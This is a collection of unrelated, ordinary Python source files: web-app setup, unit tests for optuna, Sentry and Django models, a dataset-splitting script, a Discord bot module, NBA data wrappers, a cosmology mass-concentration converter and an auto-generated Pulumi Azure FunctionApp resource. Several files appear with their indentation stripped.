app.register_blueprint(student, url_prefix='/student')
#Login manager settings
login_manager = LoginManager()
login_manager.login_view = 'auth.signin'
login_manager.init_app(app)
@login_manager.user_loader
def load_user(id):
return User.query.get(int(id))
return app
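# Usage sketch (illustrative only): assuming this module is myapp/__init__.py,
# a separate entry-point script (name assumed) could start the development
# server like this:
#
# from myapp import create_app
#
# app = create_app()
#
# if __name__ == '__main__':
#     app.run(debug=True)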
|
import numpy as np
import pytest
import optuna
def test_wfg_2d() -> None:
for n in range(2, 30):
r = n * np.ones(2)
s = np.asarray([[n - 1 - i, i] for i in range(n)])
for i in range(n + 1):
s = np.vstack((s, np.asarray([i, n - i])))
np.random.shuffle(s)
v = optuna.multi_objective._hypervolume.WFG().compute(s, r)
assert v == n * n - n * (n - 1) // 2
def test_wfg_3d() -> None:
n = 3
r = 10 * np.ones(n)
s = [np.hstack((np.zeros(i), [1], np.zeros(n - i - 1))) for i in range(n)]
for _ in range(10):
s.append(np.random.randint(1, 10, size=(n,)))
s = np.asarray(s)
np.random.shuffle(s)
v = optuna.multi_objective._hypervolume.WFG().compute(s, r)
assert v == 10 ** n - 1
def test_wfg_nd() -> None:
for n in range(2, 10):
r = 10 * np.ones(n)
s = [np.hstack((np.zeros(i), [1], np.zeros(n - i - 1))) for i in range(n)]
for _ in range(10):
s.append(np.random.randint(1, 10, size=(n,)))
s = np.asarray(s)
np.random.shuffle(s)
v = optuna.multi_objective._hypervolume.WFG().compute(s, r)
assert v == 10 ** n - 1
def test_invalid_input() -> None:
r = np.ones(3)
s = np.atleast_2d(2 * np.ones(3))
with pytest.raises(ValueError):
_ = optuna.multi_objective._hypervolume.WFG().compute(s, r)
|
usuario = input("Enter the username: \n")
senha = usuario
while senha == usuario:
    senha = input("Enter a password different from the username: ")
    if senha == usuario:
        print("The password you entered is not valid")
|
# Stress/benchmark snippet for CognateViewSet's list endpoint. It assumes
# CognateViewSet is importable from the surrounding project; the request
# factory below is DRF's standard test helper.
from rest_framework.test import APIRequestFactory

rf = APIRequestFactory()
viewset = CognateViewSet.as_view({"get": "list"})
paths = [
"/words?por=deus",
"/",
"/words",
"/words?*=no",
"/words?eng=banana&comparison=equal",
"/words?fra=bataillon&por=entidade",
"/words?fra=ba*&por=entidade",
"/words?zzzzzzz=zzzz&por=entidade",
]
for i in range(300):
for path in paths:
viewset(rf.get(path))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import random
import shutil
from common import get_filenames
# Logging
from logging import getLogger, StreamHandler, INFO
logger = getLogger()
logger.setLevel(INFO)
logger.addHandler(StreamHandler())
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir', '--input', '-i', required=True,
help='Path to input directory')
parser.add_argument('--output_dir', '--output', '-o',
default='data/',
help='Path to output base directory')
parser.add_argument('--n_test', '-n', type=int, default=128,
help='The number of files for test')
    args = parser.parse_args(argv)
return args
def main(argv):
    args = parse_arguments(argv)
basename = args.input_dir.split('/')[-2]
train_dir = os.path.join(args.output_dir, 'train', basename)
test_dir = os.path.join(args.output_dir, 'test', basename)
os.makedirs(train_dir, exist_ok=True)
os.makedirs(test_dir, exist_ok=True)
names = set(get_filenames(args.input_dir))
test_names = set(get_filenames(test_dir))
train_names = set(get_filenames(train_dir))
invalid_names = test_names & train_names
names -= test_names
names -= train_names
for name in invalid_names:
os.remove(os.path.join(test_dir, name))
logger.info('"%s" is duplicated... Remove', name)
n_test = args.n_test - len(test_names)
    test_samples = set(random.sample(sorted(names), n_test))
for name in names:
src_path = os.path.join(args.input_dir, name)
if name in test_samples:
dst_path = os.path.join(test_dir, name)
else:
dst_path = os.path.join(train_dir, name)
shutil.copyfile(src_path, dst_path)
if __name__ == '__main__':
main(sys.argv[1:])
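# Usage sketch (illustrative only; the script filename is assumed):
#
#   python split_dataset.py --input_dir data_raw/cats/ --output_dir data/ --n_test 128
#
# Note the trailing slash on --input_dir: the class name is taken from the
# second-to-last path component via input_dir.split('/')[-2].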
|
from astropy import units as u
from solarviewer.config.base import DialogController, ItemConfig, ViewerType, DataType, DataModel, ViewerController
from solarviewer.ui.rotate import Ui_Rotate
from solarviewer.viewer.map import MapModel
class RotateController(DialogController):
def __init__(self):
DialogController.__init__(self)
@property
def item_config(self) -> ItemConfig:
return ItemConfig().setTitle("Rotate").setMenuPath("Edit/Rotate").addSupportedViewer(
ViewerType.ANY).addSupportedData(DataType.MAP)
def setupContent(self, content_widget):
self._ui = Ui_Rotate()
self._ui.setupUi(content_widget)
def onDataChanged(self, viewer_ctrl: ViewerController):
pass
def modifyData(self, data_model: MapModel) -> DataModel:
rotated_map = data_model.map.rotate(angle=self._ui.angle_spin.value() * u.deg)
data_model.map = rotated_map
return data_model
|
from __future__ import absolute_import
from datetime import timedelta
import six
from django.core.urlresolvers import reverse
from django.utils import timezone
from exam import patcher
from freezegun import freeze_time
from sentry.incidents.logic import (
create_incident_activity,
subscribe_to_incident,
)
from sentry.incidents.models import (
IncidentActivityType,
IncidentStatus,
IncidentSubscription,
IncidentSuspectCommit,
)
from sentry.incidents.tasks import (
build_activity_context,
calculate_incident_suspects,
generate_incident_activity_email,
send_subscriber_notifications,
)
from sentry.models import (
Commit,
Repository,
)
from sentry.testutils import TestCase
from sentry.utils.linksign import generate_signed_link
from sentry.utils.http import absolute_uri
class BaseIncidentActivityTest(object):
@property
def incident(self):
return self.create_incident(title='hello')
class TestSendSubscriberNotifications(BaseIncidentActivityTest, TestCase):
send_async = patcher('sentry.utils.email.MessageBuilder.send_async')
def test_simple(self):
activity = create_incident_activity(
self.incident,
IncidentActivityType.COMMENT,
user=self.user,
comment='hello',
)
send_subscriber_notifications(activity.id)
# User shouldn't receive an email for their own activity
self.send_async.assert_not_called() # NOQA
self.send_async.reset_mock()
non_member_user = self.create_user(email='non_member@test.com')
subscribe_to_incident(activity.incident, non_member_user)
member_user = self.create_user(email='member@test.com')
self.create_member([self.team], user=member_user, organization=self.organization)
subscribe_to_incident(activity.incident, member_user)
send_subscriber_notifications(activity.id)
self.send_async.assert_called_once_with([member_user.email])
assert not IncidentSubscription.objects.filter(
incident=activity.incident,
user=non_member_user,
).exists()
assert IncidentSubscription.objects.filter(
incident=activity.incident,
user=member_user,
).exists()
def test_invalid_types(self):
for activity_type in (IncidentActivityType.CREATED, IncidentActivityType.DETECTED):
activity = create_incident_activity(self.incident, activity_type)
send_subscriber_notifications(activity.id)
self.send_async.assert_not_called() # NOQA
self.send_async.reset_mock()
class TestGenerateIncidentActivityEmail(BaseIncidentActivityTest, TestCase):
@freeze_time()
def test_simple(self):
activity = create_incident_activity(
self.incident,
IncidentActivityType.COMMENT,
user=self.user,
comment='hello',
)
incident = activity.incident
recipient = self.create_user()
message = generate_incident_activity_email(activity, recipient)
assert message.subject == 'Activity on Incident {} (#{})'.format(
incident.title,
incident.identifier,
)
assert message.type == 'incident.activity'
assert message.context == build_activity_context(activity, recipient)
class TestBuildActivityContext(BaseIncidentActivityTest, TestCase):
def run_test(
self,
activity,
expected_username,
expected_action,
expected_comment,
expected_recipient,
):
incident = activity.incident
context = build_activity_context(activity, expected_recipient)
assert context['user_name'] == expected_username
assert context['action'] == '%s on incident %s (#%s)' % (
expected_action,
activity.incident.title,
activity.incident.identifier,
)
assert context['link'] == absolute_uri(reverse(
'sentry-incident',
kwargs={
'organization_slug': incident.organization.slug,
'incident_id': incident.identifier,
},
)) + '?referrer=incident_activity_email'
assert context['comment'] == expected_comment
assert context['unsubscribe_link'] == generate_signed_link(
expected_recipient,
'sentry-account-email-unsubscribe-incident',
kwargs={'incident_id': incident.id},
)
def test_simple(self):
activity = create_incident_activity(
self.incident,
IncidentActivityType.COMMENT,
user=self.user,
comment='hello',
)
        recipient = self.create_user()
self.run_test(
activity,
expected_username=activity.user.name,
expected_action='left a comment',
expected_comment=activity.comment,
            expected_recipient=recipient,
)
activity.type = IncidentActivityType.STATUS_CHANGE
activity.value = six.text_type(IncidentStatus.CLOSED.value)
activity.previous_value = six.text_type(IncidentStatus.OPEN.value)
self.run_test(
activity,
expected_username=activity.user.name,
expected_action='changed status from %s to %s' % (
IncidentStatus.OPEN.name.lower(),
IncidentStatus.CLOSED.name.lower(),
),
expected_comment=activity.comment,
            expected_recipient=recipient,
)
class CalculateIncidentSuspectsTest(TestCase):
def test_simple(self):
release = self.create_release(project=self.project, version='v12')
event = self.store_event(
data={
'timestamp': (timezone.now() - timedelta(minutes=1)).isoformat()[:19],
'fingerprint': ['group-1'],
'message': 'Kaboom!',
'platform': 'python',
'stacktrace': {'frames': [{'filename': 'sentry/models/release.py'}]},
'release': release.version,
},
project_id=self.project.id,
)
group = event.group
self.repo = Repository.objects.create(
organization_id=self.organization.id,
name=self.organization.id,
)
release.set_commits([{
'id': 'a' * 40,
'repository': self.repo.name,
'author_email': 'bob@example.com',
'author_name': 'Bob',
'message': 'i fixed a bug',
'patch_set': [{'path': 'src/sentry/models/release.py', 'type': 'M'}]
}])
commit = Commit.objects.filter(releasecommit__release__in=[release])
incident = self.create_incident(self.organization, groups=[group])
calculate_incident_suspects(incident.id)
assert IncidentSuspectCommit.objects.filter(
incident=incident,
commit=commit,
).exists()
|
import discord
from yrumee.modules import Module
class GradEraserModule(Module):
"""
    <Grad School Eraser>
    [.대학원생] Show the list of grad students
    [.대학원갈래요] Disable the grad-school eraser
    [.대학원안가요] Enable the grad-school eraser
    [.대학원에 @target 살아요] Add the mentioned user to the grad-student list (e.g. .대학원에 @이건우 살아요)
    [.교수님 @target 안보여요] Remove the mentioned user from the grad-student list (e.g. .교수님 @이건우 안보여요)
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.is_active = False
self.slaves = self.storage_instance.get("slaves", [])
async def on_command(self, command: str, payload: str, message: discord.Message):
if command == "대학원생":
await message.channel.send(f"쿠아의 대학원생들 : {self.slaves}")
elif command == "대학원안가요":
if self.is_active is False:
self.is_active = True
await message.add_reaction("👌")
elif command == "대학원갈래요":
if self.is_active is True:
self.is_active = False
await message.add_reaction("👌")
elif command == "대학원에":
slave = message.mentions[0].id
self.slaves.append(slave)
await message.add_reaction("👌")
elif command == "교수님":
slave = message.mentions[0].id
if slave in self.slaves:
self.slaves.pop(self.slaves.index(slave))
await message.add_reaction("👌")
else:
await message.add_reaction("❓")
async def on_message(self, message: discord.Message) -> bool:
if (
"대학원" in message.content
and self.is_active
and message.author.id in self.slaves
):
await message.delete()
await message.channel.send("대학원은 여름이가 치워버렸다냥!")
return False
|
import os
import sys
import datetime
from retirement_api.models import (AgeChoice,
Question,
Step,
Page,
Tooltip,
Calibration)
import mock
from mock import patch, mock_open
from django.test import TestCase
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(BASE_DIR)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
class ViewModels(TestCase):
testagechoice = AgeChoice(age=62, aside="Aside.")
testquestion = Question(
title="Test Question", slug='', question="Test question.")
teststep = Step(title="Test Step")
testpage = Page(title="Page title", intro="Intro")
testtip = Tooltip(title="Test Tooltip")
testcalibration = Calibration(created=datetime.datetime.now())
def test_calibration(self):
self.assertTrue('calibration' in self.testcalibration.__unicode__())
def test_get_subhed(self):
tc = self.testagechoice
self.assertTrue("You've chosen age 62" in tc.get_subhed())
def test_question_slug(self):
self.testquestion.save()
self.assertTrue(self.testquestion.slug != '')
def test_question_translist(self):
tlist = self.testquestion.translist()
self.assertTrue(type(tlist) == list)
for term in ['question',
'answer_yes_a',
'answer_no_b',
'answer_unsure_a_subhed']:
self.assertTrue(term in tlist)
def test_question_dump(self):
m = mock_open()
with patch("__builtin__.open", m, create=True):
mock_open.return_value = mock.MagicMock(spec=file)
self.testquestion.dump_translation_text(output=True)
self.assertTrue(m.call_count == 1)
def test_question_dump_no_output(self):
dump = self.testquestion.dump_translation_text()
self.assertEqual('Test question.', dump[0])
def test_agechoice_translist(self):
tlist = self.testagechoice.translist()
self.assertTrue(type(tlist) == list)
def test_step_translist(self):
tlist = self.teststep.translist()
self.assertTrue(type(tlist) == list)
def test_page_translist(self):
tlist = self.testpage.translist()
self.assertTrue(type(tlist) == list)
def test_tooltip_translist(self):
tlist = self.testtip.translist()
self.assertTrue(type(tlist) == list)
|
"""
Contains the definition of Font.
"""
from .style import Style
class Font(Style):
"""
Represents a font style.
"""
def __init__(self, family, style, size, postscript_name):
"""Initialize this Font."""
super().__init__('font')
self.family = family
self.style = style
self.size = size
self.postscript_name = postscript_name
def __repr__(self):
"""Return a constructor-style representation of this Font."""
return str.format(
'Font(family={}, style={}, size={}, postscript_name={})',
repr(self.family), repr(self.style), repr(self.size), repr(self.postscript_name))
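# Usage sketch (illustrative only):
#
# font = Font('Helvetica', 'Bold', 12.0, 'Helvetica-Bold')
# repr(font)
# # -> "Font(family='Helvetica', style='Bold', size=12.0, postscript_name='Helvetica-Bold')"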
|
# Linear form class.
class LinearForm(object):
"""Class of linear forms."""
pass
|
import goldsberry
class transition(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Transition'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class isolation(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Isolation'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class pick_and_roll_ball_handler(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'PRBallHandler'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class pick_and_roll_man(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'PRRollMan'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class postup(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Postup'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class spotup(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Spotup'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class handoff(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Handoff'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class cut(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Cut'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class offscreen(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'OffScreen'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class offrebound(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'OffRebound'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
class misc(goldsberry.masterclass.NbaDataProviderPlayType):
def __init__(self, season=goldsberry.apiparams.default_season, team=False):
url_modifier = 'Misc'
goldsberry.masterclass.NbaDataProviderPlayType.__init__(self, url_modifier, year=season, team=team)
__all__ = ['transition', 'isolation', 'pick_and_roll_ball_handler',
'pick_and_roll_man', 'postup', 'spotup', 'handoff', 'cut',
'offscreen', 'offrebound', 'misc']
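# Usage sketch (illustrative only): every class wraps the same play-type
# endpoint with a different url_modifier. The season string format below is an
# assumption:
#
# iso_players = isolation(season='2015-16')           # player-level data
# iso_teams = isolation(season='2015-16', team=True)  # team-level data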
|
from __future__ import division
import numpy as np
import scipy.optimize as op
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.interpolate import RectBivariateSpline
from scipy import integrate
import cosmo
class ConcentrationConversion:
def __init__(self, MCrelation, cosmology=None):
self.MCrelation = MCrelation
# if isinstance(MCrelation, str):
if MCrelation=='Duffy08':
pass
elif MCrelation=='DK15':
# We compute the c-M relation for an array of z_arr and
# M_arr, and store the interpolation function in self
z_arr = np.linspace(0, 2, 21)
M_arr = np.logspace(13, 16, 301)
rho_m = cosmology['Omega_m'] * cosmo.RHOCRIT
Omh2 = cosmology['Omega_m']*cosmology['h']**2
Obh2 = cosmology['Omega_b']*cosmology['h']**2
fb = cosmology['Omega_b']/cosmology['Omega_m']
k_arr = np.logspace(-4, 2, 400)
# Eisenstein&Hu'99 transfer function (no wiggles)
# EQ 6
sound_horizon = 44.5 * np.log(9.83/Omh2) / (1 + 10*Obh2**.75)**.5
# EQ 31
alphaGamma = 1 - .328 * np.log(431 * Omh2) * fb + .38 * np.log(22.3*Omh2) * fb**2
# EQ 30
Gamma = cosmology['Omega_m']*cosmology['h'] * (alphaGamma + (1-alphaGamma)/(1 + (.43*k_arr*cosmology['h']*sound_horizon)**4))
# EQ 28
q = k_arr * (2.7255/2.7)**2 / Gamma
# EQ 29
C0 = 14.2 + 731 / (1 + 62.5*q)
L0 = np.log(2 * np.exp(1) + 1.8*q)
TF = L0 / (L0 + C0 * q**2)
# We only care about the derivative, not the normalization
PK_EHsmooth = k_arr**cosmology['ns']* TF**2
# Interpolation function for EQ 8, DK15
n_of_k = InterpolatedUnivariateSpline(np.log(k_arr), np.log(PK_EHsmooth))
# Normalized growth function
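# D(z) ~ E(z) * integral_z^inf (1+z') / E(z')^3 dz', normalized below so that D(z=0) = 1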
integrand = lambda z_int: (1+z_int) / cosmo.Ez(z_int, cosmology)**3
D_arr = np.array([cosmo.Ez(z, cosmology) * integrate.quad(integrand, z, 1e3)[0] for z in z_arr])
D_arr/= D_arr[0]
##### Compute sigma(M, z=0)
# Radius [M_arr]
R = (3 * M_arr / (4 * np.pi * rho_m))**(1/3)
R = np.append(R, 8)
# [M_arr, k_arr]
kR = k_arr[None,:] * R[:,None]
# Window functions [M_arr, k_arr]
window = 3 * (np.sin(kR)/kR**3 - np.cos(kR)/kR**2)
# Integrand [M_arr, k_arr]
integrand_sigma2 = PK_EHsmooth[None,:] * window[:,:]**2 * k_arr[None,:]**2
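# sigma^2(R) = 1/(2 pi^2) * integral P(k) W(kR)^2 k^2 dk, with W(x) = 3 (sin x - x cos x) / x^3 the top-hat window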
# sigma^2 at z = 0; shape [M_arr + 1], last entry is R = 8 Mpc/h used for the sigma8 normalization below
sigma2 = .5/np.pi**2 * np.trapz(integrand_sigma2, k_arr, axis=-1)
sigma = sigma2[:-1]**.5 * cosmology['sigma8']/sigma2[-1]**.5
# EQ 12, DK15
k_R = .69 * 2 * np.pi / R[:-1]
n = n_of_k(np.log(k_R), nu=1)
# EQ 4, DK15 [z_arr, M_arr]
nu = 1.686 / sigma[None,:] / D_arr[:,None]
# EQ 10, DK15 [M_arr]
c_min = 6.58 + n*1.37
nu_min = 6.82 + n*1.42
# EQ 9, DK15 [z_arr, M_arr]
c = .5*c_min * ((nu_min/nu)**1.12 + (nu/nu_min)**1.69)
c[c>30.] = 30.
# Set up spline interpolation in z_arr and M_arr
self.concentration = RectBivariateSpline(z_arr, M_arr, c)
else:
raise ValueError('Unknown mass-concentration relation: {}'.format(MCrelation))
# 200crit from Duffy et al 2008, input [M200c/h]
def calC200(self, m, z):
if self.MCrelation=='Duffy08':
m = np.atleast_1d(m)
m[np.where(m<1e9)] = 1e9
#return 6.71*(m/2.e12)**(-0.091)*(1.+z)**(-0.44) # relaxed samples
return 5.71*(m/2.e12)**(-0.084)*(1.+z)**(-0.47) # full sample
elif self.MCrelation=='DK15':
c = self.concentration(z, m)
# Reshape to match input...
if c.shape==(1,1):
c = c[0][0]
elif c.shape[0]==1:
c = c[0]
return c
else:
return float(self.MCrelation)
##### Actual input functions
# Input in [Msun/h]
def MDelta_to_M200(self,mc,overdensity,z):
ratio = overdensity/200.
Mmin = mc * ratio / 4.
Mmax = mc * ratio * 4.
return op.brentq(self.mdiff_findM200, Mmin, Mmax, args=(mc,overdensity,z), xtol=1.e-6)
# Input in [Msun/h]
def M200_to_MDelta(self, Minput, overdensity, z):
ratio = 200./overdensity
Mmin = Minput * ratio / 4.
Mmax = Minput * ratio * 4.
return op.brentq(self.mdiff_findMDelta, Mmin, Mmax, args=(Minput,overdensity,z), xtol=1.e-6)
##### Functions used for conversion
# NFW mass coefficient mu(c) = log(1+c) - c/(1+c); the mass enclosed within c*r_s is 4 pi rho_s r_s^3 * mu(c)
def calcoef(self, c):
return np.log(1+c)-c/(1+c)
# root function for concentration
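# For an NFW profile with scale radius r_s, M_Delta = 4 pi rho_s r_s^3 * mu(c_Delta), so at fixed r_s
# mu(c200)/mu(c_Delta) = M200/M_Delta = (200/Delta) * (c200/c_Delta)^3; diffc is zero at the matching c_Delta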
def diffc(self, c2, c200, ratio):
return self.calcoef(c200)/self.calcoef(c2) - ratio*(c200/c2)**3
def findc(self, c200, overdensity):
ratio = 200./overdensity
#if self.diffc(.1,c200,ratio)*self.diffc(100, c200, ratio)>0:
# print c200
return op.brentq(self.diffc, .1, 40., args=(c200,ratio), xtol=1.e-6)
# Root function for mass
def mdiff_findM200(self, m200, mc, overdensity, z):
con = self.calC200(m200,z)
con2 = self.findc(con,overdensity)
return m200/mc - self.calcoef(con)/self.calcoef(con2)
def mdiff_findMDelta(self,mguess,Minput,overdensity,z):
conin = self.calC200(Minput,z)
conguess = self.findc(conin,overdensity)
return Minput/mguess - self.calcoef(conin)/self.calcoef(conguess)
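# Minimal usage sketch (illustrative, not part of the original module): convert a mass
# defined at 500x the critical density to M200c and back with the Duffy08 relation.
# The mass and redshift below are arbitrary example values.
if __name__ == '__main__':
    cc = ConcentrationConversion('Duffy08')
    m500c = 3.0e14                                      # [Msun/h]
    m200c = cc.MDelta_to_M200(m500c, 500., z=0.3)       # M500c -> M200c
    m500c_back = cc.M200_to_MDelta(m200c, 500., z=0.3)  # round trip
    print('M200c = %.3e, round-trip M500c = %.3e' % (m200c, m500c_back))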
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class FunctionApp(pulumi.CustomResource):
app_service_plan_id: pulumi.Output[str]
"""
The ID of the App Service Plan within which to create this Function App.
"""
app_settings: pulumi.Output[dict]
"""
A key-value pair of App Settings.
"""
auth_settings: pulumi.Output[dict]
"""
An `auth_settings` block as defined below.
* `activeDirectory` (`dict`)
* `allowedAudiences` (`list`)
* `client_id` (`str`)
* `client_secret` (`str`)
* `additionalLoginParams` (`dict`)
* `allowedExternalRedirectUrls` (`list`)
* `defaultProvider` (`str`)
* `enabled` (`bool`) - Is the Function App enabled?
* `facebook` (`dict`)
* `app_id` (`str`)
* `app_secret` (`str`)
* `oauthScopes` (`list`)
* `google` (`dict`)
* `client_id` (`str`)
* `client_secret` (`str`)
* `oauthScopes` (`list`)
* `issuer` (`str`)
* `microsoft` (`dict`)
* `client_id` (`str`)
* `client_secret` (`str`)
* `oauthScopes` (`list`)
* `runtimeVersion` (`str`)
* `tokenRefreshExtensionHours` (`float`)
* `tokenStoreEnabled` (`bool`)
* `twitter` (`dict`)
* `consumerKey` (`str`)
* `consumerSecret` (`str`)
* `unauthenticatedClientAction` (`str`)
"""
client_affinity_enabled: pulumi.Output[bool]
"""
Should the Function App send session affinity cookies, which route client requests in the same session to the same instance?
"""
connection_strings: pulumi.Output[list]
"""
A `connection_string` block as defined below.
* `name` (`str`) - The name of the Connection String.
* `type` (`str`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
* `value` (`str`) - The value for the Connection String.
"""
default_hostname: pulumi.Output[str]
"""
The default hostname associated with the Function App - such as `mysite.azurewebsites.net`
"""
enable_builtin_logging: pulumi.Output[bool]
"""
Should the built-in logging of this Function App be enabled? Defaults to `true`.
"""
enabled: pulumi.Output[bool]
"""
Is the Function App enabled?
"""
https_only: pulumi.Output[bool]
"""
Can the Function App only be accessed via HTTPS? Defaults to `false`.
"""
identity: pulumi.Output[dict]
"""
An `identity` block as defined below.
* `principalId` (`str`) - The Principal ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `tenantId` (`str`) - The Tenant ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `type` (`str`) - Specifies the identity type of the Function App. Possible values include `SystemAssigned`.
"""
kind: pulumi.Output[str]
"""
The Function App kind - such as `functionapp,linux,container`
"""
location: pulumi.Output[str]
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
name: pulumi.Output[str]
"""
Specifies the name of the Function App. Changing this forces a new resource to be created.
"""
outbound_ip_addresses: pulumi.Output[str]
"""
A comma separated list of outbound IP addresses - such as `52.23.25.3,52.143.43.12`
"""
possible_outbound_ip_addresses: pulumi.Output[str]
"""
A comma separated list of outbound IP addresses - such as `52.23.25.3,52.143.43.12,52.143.43.17` - not all of which are necessarily in use. Superset of `outbound_ip_addresses`.
"""
resource_group_name: pulumi.Output[str]
"""
The name of the resource group in which to create the Function App.
"""
site_config: pulumi.Output[dict]
"""
A `site_config` object as defined below.
* `alwaysOn` (`bool`) - Should the Function App be loaded at all times? Defaults to `false`.
* `cors` (`dict`) - A `cors` block as defined below.
* `allowedOrigins` (`list`)
* `supportCredentials` (`bool`)
* `ftpsState` (`str`) - State of FTP / FTPS service for this function app. Possible values include: `AllAllowed`, `FtpsOnly` and `Disabled`.
* `http2Enabled` (`bool`) - Specifies whether or not the http2 protocol should be enabled. Defaults to `false`.
* `linuxFxVersion` (`str`) - Linux App Framework and version for the AppService, e.g. `DOCKER|(golang:latest)`.
* `minTlsVersion` (`str`) - The minimum supported TLS version for the function app. Possible values are `1.0`, `1.1`, and `1.2`. Defaults to `1.2` for new function apps.
* `use32BitWorkerProcess` (`bool`) - Should the Function App run in 32 bit mode, rather than 64 bit mode? Defaults to `true`.
* `virtualNetworkName` (`str`) - The name of the Virtual Network which this App Service should be attached to.
* `websocketsEnabled` (`bool`) - Should WebSockets be enabled?
"""
site_credential: pulumi.Output[dict]
"""
A `site_credential` block as defined below, which contains the site-level credentials used to publish to this App Service.
* `password` (`str`) - The password associated with the username, which can be used to publish to this App Service.
* `username` (`str`) - The username which can be used to publish to this App Service
"""
storage_connection_string: pulumi.Output[str]
"""
The connection string of the backend storage account which will be used by this Function App (such as the dashboard, logs).
"""
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
version: pulumi.Output[str]
"""
The runtime version associated with the Function App. Defaults to `~1`.
"""
def __init__(__self__, resource_name, opts=None, app_service_plan_id=None, app_settings=None, auth_settings=None, client_affinity_enabled=None, connection_strings=None, enable_builtin_logging=None, enabled=None, https_only=None, identity=None, location=None, name=None, resource_group_name=None, site_config=None, storage_connection_string=None, tags=None, version=None, __props__=None, __name__=None, __opts__=None):
"""
Manages a Function App.
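Example Usage (an illustrative sketch; the resource names, location and
consumption-plan SKU below are assumptions, not taken from the upstream docs):

    import pulumi_azure as azure

    example_rg = azure.core.ResourceGroup("example-rg", location="West Europe")
    example_storage = azure.storage.Account("examplestorage",
        resource_group_name=example_rg.name,
        location=example_rg.location,
        account_tier="Standard",
        account_replication_type="LRS")
    example_plan = azure.appservice.Plan("example-plan",
        resource_group_name=example_rg.name,
        location=example_rg.location,
        kind="FunctionApp",
        sku={"tier": "Dynamic", "size": "Y1"})
    example_function_app = azure.appservice.FunctionApp("example-function-app",
        resource_group_name=example_rg.name,
        location=example_rg.location,
        app_service_plan_id=example_plan.id,
        storage_connection_string=example_storage.primary_connection_string)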
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_service_plan_id: The ID of the App Service Plan within which to create this Function App.
:param pulumi.Input[dict] app_settings: A key-value pair of App Settings.
:param pulumi.Input[dict] auth_settings: An `auth_settings` block as defined below.
:param pulumi.Input[bool] client_affinity_enabled: Should the Function App send session affinity cookies, which route client requests in the same session to the same instance?
:param pulumi.Input[list] connection_strings: A `connection_string` block as defined below.
:param pulumi.Input[bool] enable_builtin_logging: Should the built-in logging of this Function App be enabled? Defaults to `true`.
:param pulumi.Input[bool] enabled: Is the Function App enabled?
:param pulumi.Input[bool] https_only: Can the Function App only be accessed via HTTPS? Defaults to `false`.
:param pulumi.Input[dict] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Function App. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Function App.
:param pulumi.Input[dict] site_config: A `site_config` object as defined below.
:param pulumi.Input[str] storage_connection_string: The connection string of the backend storage account which will be used by this Function App (such as the dashboard, logs).
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: The runtime version associated with the Function App. Defaults to `~1`.
The **auth_settings** object supports the following:
* `activeDirectory` (`pulumi.Input[dict]`)
* `allowedAudiences` (`pulumi.Input[list]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `additionalLoginParams` (`pulumi.Input[dict]`)
* `allowedExternalRedirectUrls` (`pulumi.Input[list]`)
* `defaultProvider` (`pulumi.Input[str]`)
* `enabled` (`pulumi.Input[bool]`) - Is the Function App enabled?
